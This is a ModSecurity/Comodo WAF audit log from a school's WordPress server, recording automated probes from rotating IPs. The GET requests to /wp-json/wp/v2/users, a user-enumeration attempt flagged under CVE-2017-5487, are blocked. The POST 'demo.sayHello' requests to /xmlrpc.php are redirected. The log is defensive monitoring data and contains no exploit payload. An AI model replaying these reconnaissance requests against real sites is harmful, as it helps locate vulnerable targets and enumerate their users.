Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e3292645-Z-- --3b53eb38-A-- [08/May/2025:10:59:22 +0700] aBwsGqcs1DvJ_HgMHE_yAgAAABg 103.236.140.4 43664 103.236.140.4 8181 --3b53eb38-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.195.187 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.195.187 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3b53eb38-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b53eb38-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746676762466309 2363 (- - -) Stopwatch2: 1746676762466309 2363; combined=1027, p1=330, p2=664, p3=0, p4=0, p5=33, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b53eb38-Z-- --75f5c145-A-- [08/May/2025:10:59:23 +0700] aBwsG6cs1DvJ_HgMHE_yAwAAAAE 103.236.140.4 43666 103.236.140.4 8181 --75f5c145-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.189.126 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.189.126 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --75f5c145-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --75f5c145-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746676763108097 2399 (- - -) Stopwatch2: 1746676763108097 2399; combined=1111, p1=392, p2=690, p3=0, p4=0, p5=28, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --75f5c145-Z-- --f99f8730-A-- [08/May/2025:10:59:23 +0700] aBwsG6cs1DvJ_HgMHE_yBAAAAAc 103.236.140.4 43668 103.236.140.4 8181 --f99f8730-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.199.131 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.199.131 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f99f8730-C-- demo.sayHello --f99f8730-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f99f8730-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746676763920688 6134 (- - -) Stopwatch2: 1746676763920688 6134; combined=4375, p1=597, p2=3535, p3=36, p4=34, p5=101, sr=79, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f99f8730-Z-- --55ed1235-A-- [08/May/2025:10:59:27 +0700] aBwsH6cs1DvJ_HgMHE_yCAAAAAw 103.236.140.4 43676 103.236.140.4 8181 --55ed1235-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.195.187 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.195.187 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --55ed1235-C-- demo.sayHello --55ed1235-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --55ed1235-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746676767028300 4338 (- - -) Stopwatch2: 1746676767028300 4338; combined=3394, p1=406, p2=2795, p3=23, p4=23, p5=87, sr=65, sw=60, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --55ed1235-Z-- --8aed226d-A-- [08/May/2025:10:59:27 +0700] aBwsH6cs1DvJ_HgMHE_yCQAAAA0 103.236.140.4 43678 103.236.140.4 8181 --8aed226d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.189.126 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.189.126 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8aed226d-C-- demo.sayHello --8aed226d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8aed226d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746676767592881 13891 (- - -) Stopwatch2: 1746676767592881 13891; combined=21030, p1=478, p2=3358, p3=26, p4=31, p5=8582, sr=75, sw=66, l=0, gc=8489 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8aed226d-Z-- --bb27dc0c-A-- [08/May/2025:11:00:05 +0700] aBwsRacs1DvJ_HgMHE_yDwAAABI 103.236.140.4 43696 103.236.140.4 8181 --bb27dc0c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.80.199 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.80.199 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bb27dc0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bb27dc0c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746676805327183 3296 (- - -) Stopwatch2: 1746676805327183 3296; combined=1427, p1=483, p2=911, p3=0, p4=0, p5=33, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bb27dc0c-Z-- --8536e528-A-- [08/May/2025:11:00:08 +0700] aBwsSKcs1DvJ_HgMHE_yEQAAABc 103.236.140.4 43700 103.236.140.4 8181 --8536e528-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.80.199 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.80.199 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8536e528-C-- demo.sayHello --8536e528-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8536e528-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746676808707524 6767 (- - -) Stopwatch2: 1746676808707524 6767; combined=4861, p1=672, p2=3949, p3=37, p4=42, p5=96, sr=83, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8536e528-Z-- --fc123f73-A-- [08/May/2025:11:00:17 +0700] aBwsUacs1DvJ_HgMHE_yEwAAABg 103.236.140.4 43706 103.236.140.4 8181 --fc123f73-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.106.115 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.106.115 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fc123f73-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fc123f73-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746676817073506 3051 (- - -) Stopwatch2: 1746676817073506 3051; combined=1330, p1=425, p2=875, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fc123f73-Z-- --e03c6538-A-- [08/May/2025:11:00:20 +0700] aBwsVKcs1DvJ_HgMHE_yFQAAAAU 103.236.140.4 43710 103.236.140.4 8181 --e03c6538-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.106.115 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.106.115 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e03c6538-C-- demo.sayHello --e03c6538-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e03c6538-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746676820900905 4914 (- - -) Stopwatch2: 1746676820900905 4914; combined=3781, p1=453, p2=3121, p3=25, p4=24, p5=92, sr=66, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e03c6538-Z-- --52a33904-A-- [08/May/2025:11:00:24 +0700] aBwsWI4K347NtBcwXKwGVQAAAIs 103.236.140.4 43724 103.236.140.4 8181 --52a33904-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.111.47 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.111.47 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --52a33904-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --52a33904-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746676824376081 3267 (- - -) Stopwatch2: 1746676824376081 3267; combined=1463, p1=498, p2=933, p3=0, p4=0, p5=32, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --52a33904-Z-- --13377336-A-- [08/May/2025:11:00:27 +0700] aBwsWys5rYyn3jlLjjK_bwAAAMs 103.236.140.4 43728 103.236.140.4 8181 --13377336-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.201.11.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.11.222 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --13377336-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --13377336-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746676827037792 2588 (- - -) Stopwatch2: 1746676827037792 2588; combined=1221, p1=418, p2=774, p3=0, p4=0, p5=29, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13377336-Z-- --c5861f0b-A-- [08/May/2025:11:00:28 +0700] aBwsXKcs1DvJ_HgMHE_yGAAAAAM 103.236.140.4 43732 103.236.140.4 8181 --c5861f0b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.111.47 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.111.47 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c5861f0b-C-- demo.sayHello --c5861f0b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c5861f0b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746676828474504 5759 (- - -) Stopwatch2: 1746676828474504 5759; combined=4219, p1=512, p2=3482, p3=29, p4=30, p5=97, sr=74, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c5861f0b-Z-- --3fbb9e05-A-- [08/May/2025:11:00:29 +0700] aBwsXacs1DvJ_HgMHE_yGQAAAA4 103.236.140.4 43736 103.236.140.4 8181 --3fbb9e05-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.178.11 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.178.11 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3fbb9e05-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3fbb9e05-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746676829534268 2919 (- - -) Stopwatch2: 1746676829534268 2919; combined=1280, p1=430, p2=820, p3=0, p4=0, p5=30, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3fbb9e05-Z-- --52958b14-A-- [08/May/2025:11:00:30 +0700] aBwsXqcs1DvJ_HgMHE_yGgAAAA0 103.236.140.4 43738 103.236.140.4 8181 --52958b14-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.201.11.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.11.222 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --52958b14-C-- demo.sayHello --52958b14-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --52958b14-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746676830121575 7099 (- - -) Stopwatch2: 1746676830121575 7099; combined=5375, p1=700, p2=4463, p3=25, p4=24, p5=95, sr=97, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --52958b14-Z-- --17b73f61-A-- [08/May/2025:11:00:31 +0700] aBwsX6cs1DvJ_HgMHE_yHgAAABM 103.236.140.4 43746 103.236.140.4 8181 --17b73f61-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.178.11 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.178.11 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --17b73f61-C-- demo.sayHello --17b73f61-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --17b73f61-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746676831598347 4608 (- - -) Stopwatch2: 1746676831598347 4608; combined=3548, p1=434, p2=2919, p3=22, p4=23, p5=88, sr=69, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --17b73f61-Z-- --aacc1339-A-- [08/May/2025:11:00:37 +0700] aBwsZacs1DvJ_HgMHE_yIAAAABY 103.236.140.4 43750 103.236.140.4 8181 --aacc1339-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.82.118 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.82.118 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --aacc1339-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aacc1339-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746676837969475 2372 (- - -) Stopwatch2: 1746676837969475 2372; combined=1101, p1=338, p2=736, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aacc1339-Z-- --1ad60e62-A-- [08/May/2025:11:00:42 +0700] aBwsaqcs1DvJ_HgMHE_yIgAAABI 103.236.140.4 43754 103.236.140.4 8181 --1ad60e62-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.82.118 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.82.118 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1ad60e62-C-- demo.sayHello --1ad60e62-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1ad60e62-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] 